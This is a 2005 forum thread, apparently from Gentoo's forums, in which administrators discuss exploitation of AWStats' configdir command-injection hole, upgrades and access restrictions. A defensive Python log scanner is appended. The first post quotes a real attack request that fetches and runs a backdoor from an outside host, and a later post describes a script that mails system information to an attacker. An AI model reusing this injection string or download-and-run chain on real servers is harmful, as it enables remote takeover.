# Awstats not secure ?

## eXess

I found this in my apache log :

```
201.9.252.72 - - [24/Feb/2005:19:32:18 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%0..;cd%20..;cd%20tmp;wget%20http://members.aol.com/cavaleirosb1/xpl/rootedoor;chmod%20777%20rootedoor;./rootedoor;echo%20;echo| HTTP/1.0" 200 687 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
```

Obviously this leads to launching the rootedoor trojan, which I found running in my process list and it evidently opened a port (8587) on my box. Fortunately this is behind a router running NAT so it shouldn't be too serious. Eventually, I'll reinstall the server this weekend (I had a couple other warnings these days)... 

So, 3 questions:

1. Is Awstats insecure? Obviously, Awstats.pl processed the commands in the configdir variable, so there must be a hole there. Is there a patch or should I just get rid of that bloody package?

2. I'll need more security in the future. I recently activated the open_basedir directive in my PHP.INI. It obviously failed. I know it is inefficient to chmod 666 the temp dirs, so I won't do that. I was wondering about safe_mode. Has anybody experience with this and can you tell me a bit more? (pros and cons, what I should look after, ...)

3. I'll get grsecurity when reinstalling, ok. Considering it's a small home system with only a few external users (friends and relatives) and relatively little activity, do you think it's relatively safe to use just grsecurity and open_basedir, or should I add safe_mode, or is it merely not enough and should I change everything from the ground up?

Thank youuuu again dear community  :Wink: 

----------

## psi0nik

awstats versions 5.0-6.2 are vulnerable to a remote command execution exploit. this has been in the wild for at least 2-3 weeks, and you should definitely upgrade to 6.3. see http://awstats.sourceforge.net/ for further information.

----------

## eXess

Yes, I saw the information just after having posted this. However, the upgrade should be done manually as the Portage ebuild is still at 6.3-r2. As I'd rather have as few manually installed packages on my system, I merely uninstalled it. I still use webalizer, which has no such risk. Rats! Awstats was so cool...  :Confused: 

As with every intrusion, I assume that, as the process was idle for about 24hrs (and I could kill it and it has not respawned since) and the install file was still in /tmp, the system has not been too much compromised. Well, the idea is that if the process had really been successful, it would have deleted all traces of itself, hmm? Maybe I'm being too optimistic. Anyway, I plan to reinstall the system shortly.

----------

## psi0nik

6.3-r2 indicates release 2 of the ebuild for awstats-6.3. installing this ebuild should get you a non-vulnerable awstats. although it's never possible to say 100%, you most likely don't need to worry too much about the proc that was running. it seems to be a backdoor/bindshell from my .5 seconds of googling it. at best, that gets the attacker a shell as apache (or whatever user you have apache configured to run as). assuming that your system was otherwise patched, and not vulnerable to any local privilege escalation exploits, you're *probably* okay.

----------

## eXess

Thanks psi0nik, that's exactly what I thought. Alas, Awstats 6.3-r2 is the version that was running at the moment the attack took place, so it definitely IS vulnerable  :Confused:  Anyway, I did not take any chances, and I'll still reinstall in a week. As I said, other warnings occurred days before this one. Not any more serious, but anyway...

Does anyone have information about safe_mode and other security measures?

----------

## wjholden

My forum just got rooted -- two days after installing Awstats.  I'm going to password protect it and make it generally inaccessible, but I'm scared of this software, no matter how much I like it.  Be really careful using Awstats guys.  This is version 6.3-r2.

----------

## j-m

:Exclamation:  Please file a bug for this if you are running the latest version available in the portage tree. Don't bother otherwise.

P.S. Could you wrap the quoted log entry in your first post? It is too long and breaks the whole layout of the page.

EDIT: I have filed the bug report, so please don't file duplicates. But more information on this would be really useful - if you have more details, please post your comments to https://bugs.gentoo.org/show_bug.cgi?id=83657

----------

## Koon

*eXess wrote:*

> Awstats 6.3-r2 is the version that was running at the moment the attack took place, so it definitely IS vulnerable

Running the secure version doesn't prevent the script kiddies from sending HTTP queries to try to abuse it. The attack will show in the logs even with the secure version. That doesn't mean it succeeded. And the fact that it shows in the logs tends to prove that it didn't, otherwise he would have wiped them... Did you find a rootedoor file somewhere on your filesystem (preferably looking at it from a secure LiveCD)?

*destuxor wrote:*

> My forum just got rooted -- two days after installing Awstats. I'm going to password protect it and make it generally inaccessible, but I'm scared of this software, no matter how much I like it. Be really careful using Awstats guys. This is version 6.3-r2.

That may be the recent phpBB hole, not AWstats... What were you running as forum software, and which version?

-- 

Koon

Gentoo Linux Security

----------

## Koon

*Koon wrote:*

> *eXess wrote:* Awstats 6.3-r2 is the version that was running at the moment the attack took place, so it definitely IS vulnerable
>
> Running the secure version doesn't prevent the script kiddies from sending HTTP queries to try to abuse it. The attack will show in the logs even with the secure version. That doesn't mean it succeeded. And the fact that it shows in the logs tends to prove that it didn't, otherwise he would have wiped them... Did you find a rootedoor file somewhere on your filesystem (preferably looking at it from a secure LiveCD)?

I misread your post, sorry. You probably were running an affected version (<6.3-r2). Could you confirm?

----------

## Koon

Oh man, I really should be sleeping. You were running 6.3-r2  :Smile: 

We'll investigate this, through https://bugs.gentoo.org/show_bug.cgi?id=83657

----------

## wjholden

Didn't expect a response like that...

Upon spending around 3 hours digging through logs and comparing filesizes in my forum's .php files it appears that what actually happened was a bug in phpBB appeared suddenly after a few weeks of running great, which just happened to occur the day after installing Awstats.

What happened was that when you clicked Login in the forum you were redirected to paypal.com or microsoft.com.  I immediately assumed that some of my forum's .php files had been replaced by something containing a backdoor/redirect (rootkit for phpBB forum).  Looking in the directory, I had forgotten to reset my permissions to 755 apache:apache after editing some files in the /var/www/localhost/htdocs/ folder; they were set to world-writable, owned by different users.  This happened the day after installing Awstats, so I quickly assumed that it was an insecurity in Awstats that had allowed what appeared to be a break-in.  I did find it highly unlikely that someone could break into my forum since it's password protected by Apache and employs SSL, so it's a fairly secure website.

It is actually a bug in phpBB and a fix is at http://www.phpbb.com/kb/article.php?article_id=83.  This bugfix is over a year old so I am shocked that it isn't fixed in the current version of phpBB, but following those directions has fixed the problem.

My forum was not rooted, but it looked like it.  The current version of Awstats is probably not as hazardous as I feared.  I'm sorry if it looks like a hoax... it's a false alarm.  Like Jakub Moc says, "phpBB is another bug-infested webapp."  I apologize for the concerns I have aroused.  I will be password-protecting Awstats in the future, though.

Again, I apologize for this false alarm.  I don't know why phpBB crapped out all of a sudden, but it appears to be completely unrelated to Awstats.  This is what happens when you speak before you research.

----------

## j-m

*destuxor wrote:*

> I will be password-protecting Awstats in the future, though.

*Phew* That was scary!  :Laughing: 

This patch could give you some inspiration for password-protecting AWStats. Hopefully it will be included in the next version. Just replace PVR with 6.3-r2 for the authentication method you will choose.

----------

## psi0nik

i do see that awstats 6.4 has been released, but they don't mention that 6.3 has any known security issues, at least on the main page. password protecting awstats takes about 5 seconds to make a .htaccess/.htpasswd.

----------

## wjholden

Thanks!  I'll install that as soon as I finish this damned Java project I'm working on.  Do you think it would be a good idea to change the name of the directory, so that rather than going to /awstats/awstats.pl through the web browser it'd be something else, like /sitestats/awstats.pl?  I know some applications break when you do this, so I guess I'll try it and post whether it works or not (I think I have to modify /etc/awstats/awstats.conf to do this).  Thanks for the support again!

----------

## j-m

I have this pointing to /stats, not /awstats and nothing broke so far...  :Smile: 

----------

## psi0nik

changing the directory definitely doesn't break anything. renaming the file, however, changes a bunch of stuff, due to awstats.pl referencing its basename a lot. so, if you change it to, for example, webstats.pl, then it'll be looking for webstats.conf or webstats.$vhost.conf

----------

## chrismcf

I was actually watching my apache logs today and I saw a curious request for awstats.  Naturally, this put me on the alert.  A quick web search later: yep, suckage! awstats is insecure.  Rooting through my apache logs, I have had several attempts on my server this way.  Everything looks ok, and as I understand it, you need a local exploit as well as this to gain root, but I will probably reinstall soon too.  I actually got hold of the script they tried to run; this url was working a little while ago:

http://www.commraw.3x.ro/goinfo

All this does is collect some information about the system and mail it to the email address provided as the first arg. In this case, scanlog@gmail.com.  Fortunately, the mail program is not available on my box, so the mail didn't go out.  Evidently, this guy's handle is ment0ru, and he is from Romania (well, he owns a domain there anyway), and he doesn't try to hide what he is up to.  I know more about him than he does about me   :Smile:   Well... hopefully...

Until I get some assurance awstats is fixed, it is blacklisted from my box  :Smile:   It is really handy though.
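As an added example, not code from any poster in this thread, here is a small Python scanner for the kind of log review eXess and chrismcf describe: it parses Apache combined-format lines, percent-decodes the query string and reports awstats.pl requests whose configdir value carries shell metacharacters (the `|`, `;` and `wget` pattern in the first post). The sample log lines are constructed for the example, with the payload host replaced by example.invalid; a legitimate configdir path and an ordinary report request are included to show they are not flagged.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache combined log: client ident user [time] "METHOD target proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) \S+'
)
# Characters that drive a shell pipeline and never belong in a configdir value.
SHELL_META = re.compile(r'[|;&`$<>\n]')

# Constructed sample lines (not taken from the thread); payload host is example.invalid.
SAMPLE_LOG = [
    '203.0.113.9 - - [24/Feb/2005:19:32:18 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://example.invalid/x;echo| HTTP/1.0" 200 687 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [24/Feb/2005:20:01:02 +0100] "GET /awstats/awstats.pl?config=example.org&output=main HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [24/Feb/2005:20:05:00 +0100] "GET /awstats/awstats.pl?configdir=%7Cid%7C HTTP/1.0" 404 0 "-" "curl/7.10"',
    '192.0.2.7 - - [24/Feb/2005:20:10:00 +0100] "GET /awstats/awstats.pl?configdir=/etc/awstats&config=site HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
]

def query_params(query):
    """Split a raw query string on '&' and percent-decode each key and value."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def check_line(line):
    """Return a finding for an awstats.pl request with a shell-style configdir, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/awstats.pl"):
        return None
    for value in query_params(parts.query).get("configdir", []):
        if SHELL_META.search(value):  # decoded value carries |, ;, backticks, $ ...
            return {"ip": m.group("ip"), "time": m.group("time"),
                    "status": int(m.group("status")), "configdir": value}
    return None

def scan(lines):
    """Run check_line over an iterable of log lines and collect the findings."""
    return [f for f in map(check_line, lines) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        # A 200 means awstats.pl answered the request; a 404 means it was not there to abuse.
        print(f"{f['time']} {f['ip']} status={f['status']} configdir={f['configdir']!r}")
```

The status column is the first thing to look at after a hit: a 200 on a vulnerable version means the command string reached the script, which is exactly the situation the first post describes.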

----------